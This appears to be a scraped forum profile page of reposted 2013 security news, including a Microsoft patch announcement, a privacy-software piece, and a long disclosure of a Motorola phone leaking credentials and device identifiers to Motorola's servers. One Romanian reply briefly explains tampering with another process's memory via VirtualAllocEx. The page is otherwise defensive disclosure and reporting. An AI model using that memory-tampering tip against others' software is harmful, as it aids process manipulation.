Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. [h=3]Microsoft to patch Six critical Remote Code Execution vulnerabilities this Tuesday[/h] Author: Mohit Kumar, The Hacker News - Sunday, July 07, 2013 Microsoft has announced Patch Tuesday for this July Month, with seven bulletins. Out of that, one is important kernel privilege escalation flaw and six critical Remote Code Execution vulnerabilities. Patch will address vulnerabilities in Microsoft Windows, .Net Framework, Silverlight and will apply to all versions of Internet Explorer from IE6 on Windows XP to IE10 on Windows 8. Often targeted by attackers to perform drive-by malware download attacks, remote code execution flaws allow an attacker to crash an application and launch malware payloads often without any sort of notification or interaction form the user. The Windows 8 maker is also patching a kernel vulnerability disclosed at the beginning of June by Google researcher Tavis Ormandy. The issue is to do with Windows kernel's EPATHOBJ::pprFlattenRec function (CVE-2013-3660) and after Ormandy released the exploit code, Metasploit module was developed to exploit the bug. The company is planning to release the update on 9 July. As usual, all fixes will be delivered via the integrated Windows Update, so no user interaction is needed. Sursa: Microsoft to patch Six critical Remote Code Execution vulnerabilities this Tuesday - The Hacker News
  2. [h=4]Following revelations about NSA surveillance, will people rush to download security and privacy software?[/h] As the U.S. government continues to pursue former NSA contractor Edward Snowden for leaking some of the country’s most sensitive intelligence secrets, the debate over federal surveillance seems to have abated somewhat—despite Snowden’s stated wish for his revelations to spark transformative and wide-ranging debate, it doesn’t seem as if anyone’s taking to the streets to protest the NSA’s reported monitoring of Americans’ emails and phone-call metadata. But that doesn’t mean privacy is dead: even before the NSA story broke, more and more companies were producing apps designed to eradicate and obfuscate user data, guarding sensitive communications from prying eyes. Late last year, for example, startup Silent Circle launched software tools for mobile devices to encrypt data while in transit, including PGP email (interoperable with external email clients) and secure video chat; its Burn Notice feature can erase messages and files after a few seconds. In December 2012, Facebook launched Poke, which nukes pictures, text and video after a predetermined amount of time. Poke was the social network’s response to the popular Snapchat, which gives images the ability to self-destruct. On the enterprise side of the equation, there’s Voltage Security, with a variety of encryption and tokenization tools; Liaison, which traffics in communications and transaction encryption; and, for database security, Application Security. In a recent email to Slashdot, the Electronic Frontier Foundation (EFF) also recommended that the security-conscious consider Tor, HTTPS (Hypertext Transfer Protocol Secure), and host-proof cryptographic platforms such as SpiderOak as methods of locking down sensitive data and communications. Will the recent revelations about the NSA lead to a spike in demand for sophisticated privacy software, leading to a glut of new apps that vaporize or encrypt data? Will privacy become a hot new segment for developers and startups? Americans are certainly concerned about privacy. In September 2012, the Pew Research Center’s Internet & American Life Project released a poll suggesting that more than 50 percent of smartphone users had decided not to install a particular app because of concerns over how the software stored and shared personal data. Other surveys have indicated similar worries over sanctity of user data. However, individual privacy concerns might not be driving investment in privacy and security software—concern over sophisticated hacking of corporate and governmental databases, and the resulting theft of valuable intellectual property, has been powering an uptick in security-related investment since at least early 2012. Tech companies might not care overmuch about your personal data—indeed, shielding your personal data prevents many IT giants from selling ads against it—but they will respond to deep-pocketed businesses’ need for hardened communications and digital storage. Ultimately, business will be the driver for security and privacy software. It’s just not an exciting topic for most people, who will rush to download the latest iteration of Instagram or Plants vs. Zombies, but who often throw up their hands and profess ignorance when asked about how they lock down their data. Those sophisticated enough—or paranoid enough—will continue to seek out solutions. But it’s unlikely that privacy is poised to become the next explosive growth opportunity, despite the current headlines. Sursa: Is Privacy the Next Big IT Industry?
  3. Huawei and China Mobile Bring LTE TDD to the Top of Mount Everest [Lhasa, China, July 2, 2013]: Huawei, a leading global information and communications technology (ICT) solutions provider, today announced the successful deployment with China Mobile of 4G coverage atop Mount Everest, 5,200 meters above sea level. At a June 11 ceremony marking the launch of the service, China Mobile demonstrated a series of new 4G technologies to more than 200 guests including live HD video streaming from a Mount Everest base camp to the event venue. Huawei has already delivered 4G solutions to other parts of the region including EPC, integrated equipment rooms, BTS, microwave transmission and 4G devices. In 2007, Huawei worked with China Mobile and others to realize GSM coverage on Mount Everest to ensure mountain climber safety and to prepare for a leg of the 2008 Olympic Games torch relay. Huawei’s GSM base stations at the Mount Everest base camp have operated smoothly ever since and continue to provide visitors with mobile services. David Wang, President of Huawei Wireless Networks, said: “Bringing 4G to Mount Everest marks an important milestone in global LTE TDD development. We are very excited to make this possible, and look forward to working with more operators worldwide to bring high-speed mobile broadband services anytime and anywhere.” By May 2013, Huawei has deployed LTE TDD solutions for nearly 40 operators in Asia, the Middle East, North America, South America, Western Europe, Russia and Africa. Sursa: Huawei and China Mobile Bring LTE TDD to the Top of Mount Everest - About Huawei
  4. Penetration Testing for iPhone Applications: iPhone forensics can be performed on the backups made by iTunes or directly on the live device. This Previous article on iPhone forensics detailed the forensic techniques and the technical challenges involved in performing live device forensics. Forensic analysis on a live device reboots the phone and may alter the information stored on the device. In critical cases, forensic examiners rely on analyzing the iPhone logical backups acquired through iTunes. iTunes uses AFC (Apple file connection) protocol to take the backup and also the backup process does not modify anything on the iPhone except the escrow key records. This article explains the technical procedure and challenges involved in extracting data and artifacts from the iPhone backups. Understanding the forensics techniques on iTunes backups is also useful in cases where we get physical access to the suspect’s computer instead of the iPhone directly. When a computer is used to sync with the iPhone, most of the information on the iPhone is likely to be backed up onto the computer. So, gaining access to the computer’s file system will also give access to the mobile devices’ data. Note: iPhone 4 GSM model with iOS 5.0.1 is used for the demos. Backups shown in the article are captured using iTunes 10.6. Goal: Extracting data and artifacts from the backup without altering any information. Researchers at Sogeti Labs have released open source forensic tools (with the support of iOS 5) to read normal and encrypted iTunes backups. Below are the details outlining their research and an overview on usage of backup recovery tools. Backups: With iOS 5, data stored on the iPhone can be backed up to a computer with iTunes or to a cloud based storage with iCloud. This article briefs about iCloud backups and provides a deep analysis of iTunes backups. ............................................................................ iPhone Forensics – Analysis of iOS 5 backups : Part 1 iPhone Forensics – Analysis of iOS 5 backups : Part 2 Penetration Testing for iPhone Applications – Part 3 Penetration Testing for iPhone Applications – Part 4 Penetration Testing for iPhone Applications – Part 5
  5. 1. E un fel de kickstarter in care investitia e de 500 de $? 2. Din cei 500 de $ cati ii vor reveni programatorului? Sau munca omului nu este considerata "in cadrul proiectului"? 3. Cui revin drepturile de autor pentru proiectul respectiv daca acesta e castigator? 4. Dupa ce un proiect castiga, ce se intampla mai departe? Cum se dezvolta? Sunt doar cateva intrebari prin care vreau sa ma asigur ca totul e in regula.
  6. Ar fi frumos un tutorial despre cum functioneaza, in detaliu.
  7. Da, se pot modifica datele. Cel mai practic e sa aloci memorie in procesul repsectiv (VirtualAllocEx) si sa pui in acel buffer datele modificate, iar la apelul functiei sa folosesti noile date (pointerul alocat de tine).
  8. Motorola Is Listening article by Ben Lincoln In June of 2013, I made an interesting discovery about the Android phone (a Motorola Droid X2) which I was using at the time: it was silently sending a considerable amount of sensitive information to Motorola, and to compound the problem, a great deal of it was over an unencrypted HTTP channel. If you're in a hurry, you can skip straight to the Analysis - email, ActiveSync, and social networking section - that's where the most sensitive information (e.g. email/social network account passwords) is discussed. Technical notes The screenshots and other data in this article are more heavily-redacted than I would prefer in the interest of full disclosure and supporting evidence. There are several reasons for this: There is a considerable amount of binary, hex-encoded, and base64-encoded data mixed in with the traffic. As I have not performed a full reverse-engineering of the data, it's hard for me to know if any of these values are actually sensitive at this time, or in the future when someone more thoroughly decodes the protocol. My employer reminds its employees that publicly identifying themselves as employees of that organization conveys certain responsibilities upon them. I do not speak for my employer, so all information that would indicate who that employer is has been removed. I would rather not expose my personal information more than Motorola has already. Discovery I was using my personal phone at work to do some testing related to Microsoft Exchange ActiveSync. In order to monitor the traffic, I had configured my phone to proxy all HTTP and HTTPS traffic through Burp Suite Professional - an intercepting proxy that we use for penetration testing - so that I could easily view the contents of the ActiveSync communication. Looking through the proxy history, I saw frequent HTTP connections to ws-cloud112-blur.svcmot.com mixed in with the expected ActiveSync connections. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] ActiveSync Configuration Information [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] ActiveSync configuration information being sent to Motorola's Blur service. [/TD] [/TR] [/TABLE] As of 22 June, 2013, svcmot.com is a domain owned by Motorola, or more specifically: Motorola Trademark Holdings, LLC 600 North US Highway 45 Attn: Law Department Libertyville IL 60048 US internic@motorola.com +1.8475765000 Fax: +1.8475234348 I was quickly able to determine that the connections to Motorola were triggered every time I updated the ActiveSync configuration on my phone, and that the unencrypted HTTP traffic contained the following data: The DNS name of the ActiveSync server (only sent when the configuration is first created). The domain name and user ID I specified for authentication. The full email address of the account. The name of the connection. As I looked through more of the proxy history, I could see less-frequent connections in which larger chunks of data were sent - for example, a list of all the application shortcuts and widgets on my phone's home screen(s). Analysis - email, ActiveSync, and social networking I decided to try setting up each of the other account types that the system would allow me to, and find out what was captured. Facebook and Twitter For both of these services, the email address and password for the account are sent to Motorola. Both services support a mechanism (oAuth) explicitly intended to make this unnecessary, but Motorola does not use that more-secure mechanism. The password is only sent over HTTPS, so at least it can't be easily intercepted by most third parties. Most subsequent connectivity to both services (other than downloading images) is proxied through Motorola's system on the internet using unencrypted HTTP, so Motorola and anyone running a network capture can easily see who your friends/contacts are (including your friends' email addresses), what posts you're reading and writing, and so on. They'll also get a list of which images you're viewing, even though the actual image download comes directly from the source. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Facebook and Twitter data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Facebook password [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Facebook friend information [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Facebook wall post by friend [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Facebook wall post by self [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Silent Signon [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Twitter password [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Twitter following information [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Twitter post [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Twitter posts are also read through Blur [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] You know your software is trustworthy and has nothing to hide when it has a function called "silent signon". [/TD] [/TR] [/TABLE] Photobucket and Picasa For both services, email address and password are sent to Motorola over HTTPS. For Photobucket, username and image URLs are sent over unencrypted HTTP. For Picasa, email address, display name, friend information, and image URLs are sent over unencrypted HTTP. During my testing of Photobucket, the photo was uploaded through Motorola's system (over HTTPS). I was not able to successfully upload a photo to Picasa, although it appeared that the same would have been true for that service. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Photobucket and Picasa data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Photobucket password [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Photobucket user ID and friend information [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Picasa password [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Picasa name and friend information [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Photo uploads (to Facebook, Photobucket, etc.) When uploading images, the uploaded image passes through Motorola's Blur servers, and at least some of the time is uploaded with its EXIF data intact. EXIF data is where things like GPS coordinates are stored. The full path of the original image on the device is also sent to Motorola. For example, /mnt/sdcard/dcim/Camera/2013-06-20_09-00-00_000.jpg. Android devices name phone-camera images using the time they were taken with millisecond resolution, which can almost certainly be used as a unique device identifier for your phone (how many other people were taking a picture at exactly that millisecond?), assuming you leave the original photo on your phone. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Data sent to Motorola's Blur service when uploading photos [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Full local path [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] EXIF data [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Service username and tags [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Youtube Email address and password are sent to Motorola over HTTPS. Email address is also sent to Motorola over unencrypted HTTP, along with some other data that I haven't deciphered. I didn't have time to create and upload a video, so I'm not sure what else might be sent. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Youtube data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Youtube password [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Email address [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Exchange ActiveSync Domain name, username, email address, and name of the connection are sent over unencrypted HTTP. When a new connection is created, the Exchange ActiveSync server's DNS name is also sent. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Exchange ActiveSync data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] EAS initial setup [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] IMAP/POP3 email Email address, inbound/outbound server names, and the name of the connection are sent over unencrypted HTTP. There is a lot of other encoded/encrypted data included which I haven't deciphered. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] IMAP account data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] IMAP configuration [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] One of the few screenshots I can leave some of the important details visible in - in this case, because the account in question is already on every spam list in the world. [/TD] [/TR] [/TABLE] Yahoo Mail Email address is sent over unencrypted HTTP. This type of account seems to be handled in at least sort of the correct way by Motorola's software, in that a request is made for an access token, and as far as I can tell, the actual account password is never sent to Motorola. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Photobucket and Picasa data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Yahoo Mail address [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Flickr Similar to the Yahoo Mail results, but actually one step better - an explicit Flickr prompt appears indicating what permissions Motorola's system is asking for on behalf of the user. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Flickr [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Permission screen [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] The Flickr integration behaves the way every other part of Motorola's Blur service should. [/TD] [/TR] [/TABLE] GMail/Google Interestingly, no data seemed to be sent to Motorola about this type of account. Unfortunately, if anyone adds a Youtube or Picasa account, they've sent their GMail/Google+ credentials to Motorola anyway. Also interestingly, while testing Picasa and/or Youtube integration, Motorola's methods of authenticating actually tripped Google's suspicious activity alarm. Looking up the source IP in ARIN confirmed the connection was coming from Motorola. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Google: on guard against suspicious vendors [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Suspicious activity detected [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Source of the suspicious activity confirmed [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Firefox sync No data seems to pass through Motorola's servers. News / RSS RSS feeds that are subscribed to using the built-in News application are proxied through Motorola's servers over unencrypted HTTP. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Photobucket and Picasa data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] RSS / News sync [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] Other data Every few minutes, my phone sends Motorola a detailed description of my home screen/workspace configuration - all of the shortcuts and widgets I have on it. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Home screen configuration and other data sent to Motorola's Blur service [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Home screen configuration [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Universal account IDs [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] "Universal account IDs"? Is that why I only see some data sent the very first time I configure a particular account on my phone? [/TD] [/TR] [/TABLE] Analysis - "check-in" data As I was looking through the data I've already mentioned, I noticed chunks of "check-in" data which was a binary upload, and I thought I'd see if it was in some sort of standard compressed format. As it turns out, it is - the 0x1F8B highlighted below is the header for a block of gzip-compressed data. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] GZip compressed-data header embedded in check-in data [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] GZip header (0X1F8B) [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [TD=class: InlineGroupedThumbnailTable] [/TD] [/TR] [TR] [TD=class: Details, colspan: 5] [/TD] [/TR] [/TABLE] What is contained in this data are essentially debug-level log entries from the device. The battery drain and bandwidth use from having the phone set up like this must be unbelievable. Most of the data that's uploaded is harmless or low-risk on its own - use statistics, and so on. However, this is another mechanism by which Motorola's servers are collecting information like account names/email addresses, and the sheer volume and variety of other data makes me concerned that Motorola's staff apparently care so much about how I'm using my phone. If this were a corporate-owned device, I would expect the owning corporation to have this level of system data collection enabled, but it concerns me that it's being silently collected from my personal device, and that there is no way to disable it. Information that is definitely being collected The IMEI and IMSI of the phone. These are referred to as MEID and MIN in the phone's UI and on the label in the battery compartment, but IMEI and IMSI in the logs. I believe these two values are all that's needed to clone a phone, if someone were to intercept the traffic. The phone number of the phone, and carrier information (e.g. Verizon). The barcode from inside the battery compartment. Applications included with the device as well as installed by the user. Statistics about how those applications are used (e.g. how much data each one has sent and received). Phone call and text message statistics. For example, how many calls have been received or missed. Bluetooth device pairing and unpairing, including detailed information about those devices. Email addresses/usernames for accounts configured on the device. Contact statistics (e.g. how many contacts are synced from Google, how many Facebook users are friends of the account I've configured on the device). Device-level event logs (these are sent to Google as well by a Google-developed checkin mechanism). Debugging/troubleshooting information about most activities the phone engages in. Signal strengths statistics and data use for each type of radio included in the device. For example, bytes sent/received via 3G versus wifi. Stack memory and register dumps related to applications which have crashed. For Exchange ActiveSync setup, the server name and email address, as well as the details of the security policy enforced by that EAS server. Information that may be being collected The terms-of-use/privacy policy for the Blur service (whether you know you're using it or not) explicitly specify that location information (e.g. GPS coordinates) may be collected (see Speaking of that privacy policy..., below). I have not seen this in the data I've intercepted. This may be due to it being represented in a non-obvious format, or it may only be collected under certain conditions, or it may only be collected by newer devices than my 2-year-old Droid X2. While I have no conclusive evidence, I did notice while adding and removing accounts from my phone that the account ID number for a newly-added account is always higher than that for any accounts that existed previously on the device, even if those accounts have been deleted. This implies to me that Motorola's Blur service may be storing information about the accounts I've "deleted" even though they're no longer visible to me. This seems even more likely given the references in the communication to "universalAccountIds" and "knownAccountIds" referenced by GUID/UUID-like values. [TABLE=class: InlineGroupedThumbnails, width: 600] [TR] [TD=class: MetaCaption, colspan: 5] Check-in data being sent to Motorola [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Application use stats [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Basic hardware properties [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Bluetooth headset use-tracking [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Data use, SMS text, contact, and CPU stats [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Label in the battery compartment of my phone [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] BlurID, IMEI and barcode (from label), IMSI and phone number [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] EAS setup information [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] EAS policy elements [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Email and Disk Stats [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Event logs (these are also captured by Google) [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Image upload bug [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Logging of newly-installed applications [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Missed calls [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] I told you it was syncing every nine minutes! [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Possible client-side SQL injection vulnerability [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Radio and per-application stats (e.g. CPU use by app) [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Register and stack memory dump [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Sync App IDs: 10, 31, 80 [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] [/TD] [/TR] [TR] [TD=class: Caption] Sync App IDs: 40, 70, 20, 2, 60, and 5 [/TD] [/TR] [/TABLE] [/TD] [TD=class: InlineGroupedThumbnailTable] [TABLE=class: InlineGroupedThumbnail] [TR] [TD=class: Image] 